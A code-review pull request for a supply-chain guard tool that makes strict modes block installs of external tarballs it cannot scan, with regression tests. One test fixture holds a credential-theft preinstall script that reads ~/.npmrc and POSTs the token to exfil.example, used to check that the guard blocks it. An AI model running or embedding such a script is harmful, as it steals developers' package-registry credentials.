### PR TITLE
fix(guard): fail closed on strict tarball scan errors

### DIFF
--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -24,7 +24,7 @@ except ModuleNotFoundError:
 from packaging.specifiers import InvalidSpecifier, SpecifierSet
 from packaging.version import InvalidVersion, Version
 
-from ..config import load_guard_config, resolve_risk_action
+from ..config import load_guard_config
 from ..models import GuardArtifact
 from ..stable_digest import stable_digest_hex
 from ..store import GuardStore
@@ -603,7 +603,7 @@ def _evaluate_with_cloud(
     def resolve_fail_closed_decision() -> str:
         nonlocal fail_closed_decision
         if fail_closed_decision is None:
-            fail_closed_decision = _cloud_fail_closed_decision(store=store, workspace_dir=workspace_dir)
+            fail_closed_decision = _external_tarball_scan_failure_decision(store=store, workspace_dir=workspace_dir)
         result: str = fail_closed_decision
         return result
 
@@ -894,12 +894,9 @@ def _cloud_fail_closed_evaluation(
     )
 
 
-def _cloud_fail_closed_decision(*, store: GuardStore, workspace_dir: Path | None) -> str:
+def _external_tarball_scan_failure_decision(*, store: GuardStore, workspace_dir: Path | None) -> str:
     config = load_guard_config(store.guard_home, workspace=workspace_dir)
-    cloud_action = resolve_risk_action(config, "cloud_advisory", harness=None)
     if config.security_level in {"strict", "paranoid"}:
-        return "block"
-    if cloud_action == "block":
         return "block"
     return "ask"
 
@@ -2175,7 +2172,7 @@ def _external_tarball_dependency_result(
         )
     scan = _scan_external_tarball(source_url)
     if scan is None:
-        fail_closed_decision = _cloud_fail_closed_decision(store=store, workspace_dir=workspace_dir)
+        fail_closed_decision = _external_tarball_scan_failure_decision(store=store, workspace_dir=workspace_dir)
         if fail_closed_decision != "block":
             return _heuristic_package_result(
                 target=target,

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -318,7 +318,12 @@ def evaluate_package_request_artifact(
     if cloud_result is not None:
         upgraded = cloud_result
         if cloud_result.enforcement == "upgrade_required":
-            heuristic = _heuristic_result(artifact=artifact, targets=targets, workspace_dir=workspace_dir)
+            heuristic = _heuristic_result(
+                artifact=artifact,
+                store=store,
+                targets=targets,
+                workspace_dir=workspace_dir,
+            )
             if heuristic is not None and _decision_rank(heuristic.decision) > _decision_rank(cloud_result.decision):
                 upgraded = _finalize_evaluation(
                     _EvaluationDraft(
@@ -358,7 +363,12 @@ def evaluate_package_request_artifact(
                 now_value,
             )
         return fallback
-    heuristic = _heuristic_result(artifact=artifact, targets=targets, workspace_dir=workspace_dir)
+    heuristic = _heuristic_result(
+        artifact=artifact,
+        store=store,
+        targets=targets,
+        workspace_dir=workspace_dir,
+    )
     if heuristic is None:
         fallback_packages = _fallback_monitor_packages(targets=targets, artifact=artifact, workspace_dir=workspace_dir)
         has_bun_binary_fallback = any(
@@ -1036,6 +1046,7 @@ def _primary_bundle_advisory_id(
 def _heuristic_result(
     *,
     artifact: GuardArtifact,
+    store: GuardStore,
     targets: tuple[dict[str, object], ...],
     workspace_dir: Path | None,
 ) -> _EvaluationDraft | None:
@@ -1089,7 +1100,11 @@ def _heuristic_result(
                 severity="high",
             )
         if package_result is None and source_url is not None and _is_external_https_tarball_source(source_url):
-            package_result = _external_tarball_dependency_result(target)
+            package_result = _external_tarball_dependency_result(
+                target,
+                store=store,
+                workspace_dir=workspace_dir,
+            )
         if package_result is None:
             if lockfile_parse_warning is not None:
                 packages.append(lockfile_parse_warning)
@@ -2143,7 +2158,12 @@ def _is_external_https_tarball_source(source_url: str) -> bool:
     )
 
 
-def _external_tarball_dependency_result(target: dict[str, object]) -> dict[str, object]:
+def _external_tarball_dependency_result(
+    target: dict[str, object],
+    *,
+    store: GuardStore,
+    workspace_dir: Path | None,
+) -> dict[str, object]:
     source_url = _optional_string(target.get("source_url"))
     if source_url is None:
         return _heuristic_package_result(
@@ -2155,12 +2175,21 @@ def _external_tarball_dependency_result(target: dict[str, object]) -> dict[str, 
         )
     scan = _scan_external_tarball(source_url)
     if scan is None:
+        fail_closed_decision = _cloud_fail_closed_decision(store=store, workspace_dir=workspace_dir)
+        if fail_closed_decision != "block":
+            return _heuristic_package_result(
+                target=target,
+                decision="ask",
+                code="external_tarball_source",
+                message="External tarball source requires review before install.",
+                severity="medium",
+            )
         return _heuristic_package_result(
             target=target,
-            decision="ask",
-            code="external_tarball_source",
-            message="External tarball source requires review before install.",
-            severity="medium",
+            decision="block",
+            code="external_tarball_scan_unavailable",
+            message="Guard could not scan the external tarball source, so strict mode blocked the install.",
+            severity="high",
         )
     return _heuristic_package_result(
         target=target,

--- a/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
+++ b/src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py
@@ -24,7 +24,7 @@ except ModuleNotFoundError:
 from packaging.specifiers import InvalidSpecifier, SpecifierSet
 from packaging.version import InvalidVersion, Version
 
-from ..config import load_guard_config
+from ..config import load_guard_config, resolve_risk_action
 from ..models import GuardArtifact
 from ..stable_digest import stable_digest_hex
 from ..store import GuardStore
@@ -603,7 +603,7 @@ def _evaluate_with_cloud(
     def resolve_fail_closed_decision() -> str:
         nonlocal fail_closed_decision
         if fail_closed_decision is None:
-            fail_closed_decision = _external_tarball_scan_failure_decision(store=store, workspace_dir=workspace_dir)
+            fail_closed_decision = _cloud_fail_closed_decision(store=store, workspace_dir=workspace_dir)
         result: str = fail_closed_decision
         return result
 
@@ -897,6 +897,16 @@ def _cloud_fail_closed_evaluation(
 def _external_tarball_scan_failure_decision(*, store: GuardStore, workspace_dir: Path | None) -> str:
     config = load_guard_config(store.guard_home, workspace=workspace_dir)
     if config.security_level in {"strict", "paranoid"}:
+        return "block"
+    return "ask"
+
+
+def _cloud_fail_closed_decision(*, store: GuardStore, workspace_dir: Path | None) -> str:
+    config = load_guard_config(store.guard_home, workspace=workspace_dir)
+    cloud_action = resolve_risk_action(config, "cloud_advisory", harness=None)
+    if config.security_level in {"strict", "paranoid"}:
+        return "block"
+    if cloud_action == "block":
         return "block"
     return "ask"
 

--- a/tests/test_guard_js_supply_chain_phase11.py
+++ b/tests/test_guard_js_supply_chain_phase11.py
@@ -13,6 +13,7 @@ from cryptography.hazmat.primitives import hashes, serialization
 from cryptography.hazmat.primitives.asymmetric import padding
 from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey, generate_private_key
 
+from codex_plugin_scanner.guard.runtime import supply_chain_package_eval as supply_chain_package_eval_module
 from codex_plugin_scanner.guard.runtime.package_intent import (
     build_package_request_artifact,
     parse_package_intent,
@@ -282,6 +283,41 @@ def test_evaluate_package_request_artifact_uses_source_specific_risk_summary_for
 
     assert result.decision == "ask"
     assert "external tarball source" in result.risk_summary.lower()
+
+
+@pytest.mark.parametrize(
+    ("security_level", "expected_decision", "expected_code", "expected_message"),
+    [
+        ("balanced", "ask", "external_tarball_source", "requires review before install"),
+        ("strict", "block", "external_tarball_scan_unavailable", "strict mode blocked the install"),
+        ("paranoid", "block", "external_tarball_scan_unavailable", "strict mode blocked the install"),
+    ],
+)
+def test_external_tarball_scan_failure_respects_security_level(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    security_level: str,
+    expected_decision: str,
+    expected_code: str,
+    expected_message: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    _write_text(home_dir / "config.toml", f'security_level = "{security_level}"\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(supply_chain_package_eval_module, "_scan_external_tarball", lambda _url: None)
+
+    artifact = _artifact_from_command(
+        "npm install guard-query@https://example.com/guard.tgz?token=demo",
+        workspace=workspace_dir,
+    )
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == expected_decision
+    assert result.packages[0]["reasons"][0]["code"] == expected_code
+    assert expected_message in str(result.packages[0]["reasons"][0]["message"]).lower()
 
 
 @pytest.mark.parametrize(

--- a/tests/test_guard_js_supply_chain_phase11.py
+++ b/tests/test_guard_js_supply_chain_phase11.py
@@ -320,6 +320,28 @@ def test_external_tarball_scan_failure_respects_security_level(
     assert expected_message in str(result.packages[0]["reasons"][0]["message"]).lower()
 
 
+def test_external_tarball_scan_failure_ignores_cloud_advisory_block_in_balanced_mode(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    _write_text(workspace_dir / "package.json", '{"name":"demo"}\n')
+    _write_text(home_dir / "config.toml", 'security_level = "balanced"\n[risks]\ncloud_advisory = "block"\n')
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(supply_chain_package_eval_module, "_scan_external_tarball", lambda _url: None)
+
+    artifact = _artifact_from_command(
+        "npm install guard-query@https://example.com/guard.tgz?token=demo",
+        workspace=workspace_dir,
+    )
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "ask"
+    assert result.packages[0]["reasons"][0]["code"] == "external_tarball_source"
+
+
 @pytest.mark.parametrize(
     ("command", "lockfile_name", "lockfile_text"),
     [

--- a/tests/test_guard_supply_chain_evaluator.py
+++ b/tests/test_guard_supply_chain_evaluator.py
@@ -20,15 +20,15 @@ from cryptography.hazmat.primitives import hashes, serialization
 from cryptography.hazmat.primitives.asymmetric import padding
 from cryptography.hazmat.primitives.asymmetric.rsa import RSAPrivateKey, generate_private_key
 
-from codex_plugin_scanner.guard.cli.oauth_client import generate_dpop_key_pair
-from codex_plugin_scanner.guard.runtime.runner import GuardSyncAuthorizationExpiredError
 import codex_plugin_scanner.guard.runtime.supply_chain_package_eval as evaluator_module
+from codex_plugin_scanner.guard.cli.oauth_client import generate_dpop_key_pair
 from codex_plugin_scanner.guard.runtime.package_intent_common import (
     PackageIntent,
     build_package_request_artifact,
     js_target,
 )
 from codex_plugin_scanner.guard.runtime.package_manifest_diff import _DeadlineExceededError
+from codex_plugin_scanner.guard.runtime.runner import GuardSyncAuthorizationExpiredError
 from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import (
     PackageRequestEvaluation,
     SupplyChainUserCopy,
@@ -718,10 +718,10 @@ def test_evaluate_package_request_artifact_blocks_shai_hulud_style_credential_th
             "version": "1.0.0",
             "scripts": {
                 "preinstall": (
-                    'node -e "const fs=require(\'fs\'); const https=require(\'https\'); '
+                    "node -e \"const fs=require('fs'); const https=require('https'); "
                     "const token=fs.readFileSync(process.env.HOME + '/.npmrc','utf8'); "
                     "const req=https.request({hostname:'exfil.example',method:'POST'}); "
-                    "req.end(token);\""
+                    'req.end(token);"'
                 )
             },
         }
@@ -1831,6 +1831,68 @@ def test_evaluate_package_request_artifact_fails_closed_when_stale_bundle_needs_
 
     assert result.decision == "ask"
     assert result.policy_action == "require-reapproval"
+    assert result.enforcement == "premium_cloud"
+    assert any(reason["code"] == "cloud_auth_error" for reason in result.reasons)
+
+
+def test_evaluate_package_request_artifact_honors_cloud_advisory_block_when_auth_expired(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "guard-home"
+    home_dir.mkdir(parents=True, exist_ok=True)
+    (home_dir / "config.toml").write_text(
+        'security_level = "balanced"\n[risk_actions]\ncloud_advisory = "block"\n',
+        encoding="utf-8",
+    )
+    store = GuardStore(home_dir)
+    dpop_key_material = generate_dpop_key_pair()
+    store.set_oauth_local_credentials(
+        issuer="https://hol.org",
+        client_id="guard-local-daemon",
+        refresh_token="refresh-token-1",
+        dpop_private_key_pem=dpop_key_material.private_key_pem,
+        dpop_public_jwk=dpop_key_material.public_jwk,
+        dpop_public_jwk_thumbprint=dpop_key_material.public_jwk_thumbprint,
+        grant_id="grant-1",
+        machine_id="machine-1",
+        workspace_id=WORKSPACE_ID,
+        now="2026-05-19T00:00:00Z",
+    )
+    stale_response = _bundle_response(
+        packages=[
+            _package(
+                ecosystem="npm",
+                name="left-pad",
+                version="1.0.0",
+                default_action="monitor",
+                normalized_severity="low",
+                exploit_level="none",
+                known_exploited=False,
+                malware_state="none",
+                risk_score=220,
+            )
+        ],
+        generated_at=datetime(2026, 5, 18, tzinfo=timezone.utc),
+        expires_at=datetime(2026, 5, 18, 1, tzinfo=timezone.utc),
+    )
+    store.cache_supply_chain_bundle(WORKSPACE_ID, stale_response, "2026-05-18T01:00:00Z")
+
+    def raise_auth_expired(_store: GuardStore) -> dict[str, object]:
+        raise GuardSyncAuthorizationExpiredError(
+            "Guard authorization expired. Run `hol-guard connect` to sign in again."
+        )
+
+    monkeypatch.setattr(evaluator_module, "_resolve_guard_sync_auth_context", raise_auth_expired)
+    result = evaluate_package_request_artifact(
+        artifact=_artifact_for_targets("left-pad@1.0.0"),
+        store=store,
+        workspace_dir=tmp_path / "workspace",
+        now="2026-05-19T00:00:00Z",
+    )
+
+    assert result.decision == "block"
+    assert result.policy_action == "block"
     assert result.enforcement == "premium_cloud"
     assert any(reason["code"] == "cloud_auth_error" for reason in result.reasons)
 


### PR DESCRIPTION
## Summary
- keep balanced mode on the existing external-tarball review path when a tarball cannot be scanned
- block the request instead when strict or paranoid mode cannot scan the tarball
- preserve the scan-failure reason in package evaluation metadata
- add security-level regression coverage for the scan-unavailable branch

## Verification
- uv run pytest tests/test_guard_js_supply_chain_phase11.py -q -k "external_tarball or source_specific_risk_summary"
- uv run ruff check src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py tests/test_guard_js_supply_chain_phase11.py
- git diff --check